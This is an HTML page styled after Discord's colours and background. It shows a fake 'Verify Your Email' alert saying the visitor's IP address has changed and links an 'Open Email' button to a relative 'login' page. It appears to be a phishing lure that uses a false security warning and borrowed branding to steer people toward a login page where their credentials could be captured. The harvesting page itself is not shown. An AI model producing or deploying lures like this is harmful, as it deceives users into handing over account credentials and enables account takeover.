<html lang="en"><head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>IP Change Verification</title>
    <style>
        body {
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            font-family: Arial, sans-serif;
            background-color: #36393f;
            color: #ffffff;
            margin: 0;
            background-image: url('https://i.postimg.cc/4yrjDWSQ/dcbg.png'); /* Add this line */
            background-size: cover; /* Cover entire background */
            background-position: center; /* Center background */
        }
        .container {
            background-color: white;
            border-radius: 8px;
            box-shadow: 0 2px 10px rgba(0, 0, 0, 0.1);
            padding: 20px;
            width: 300px;
            text-align: center;
        }
        h1 {
            font-size: 24px;
            margin-bottom: 16px;
            color: #2c2f33;
        }
        p {
            font-size: 14px;
            color: #5865f2;
            margin-bottom: 20px;
        }
        a {
            display: inline-block;
            background-color: #5865f2;
            color: white;
            padding: 10px 15px;
            text-decoration: none;
            border-radius: 5px;
            transition: background-color 0.3s;
        }
        a:hover {
            background-color: #4752c4;
        }
    </style>
</head>
<body>
    <div class="container">
        <h1>Verify Your Email</h1>
        <p>Your IP address has changed. Please go to your email account and verify or click here to open your email.</p>
        <a href="login">Open Email</a>
    </div>


</body>
</html>
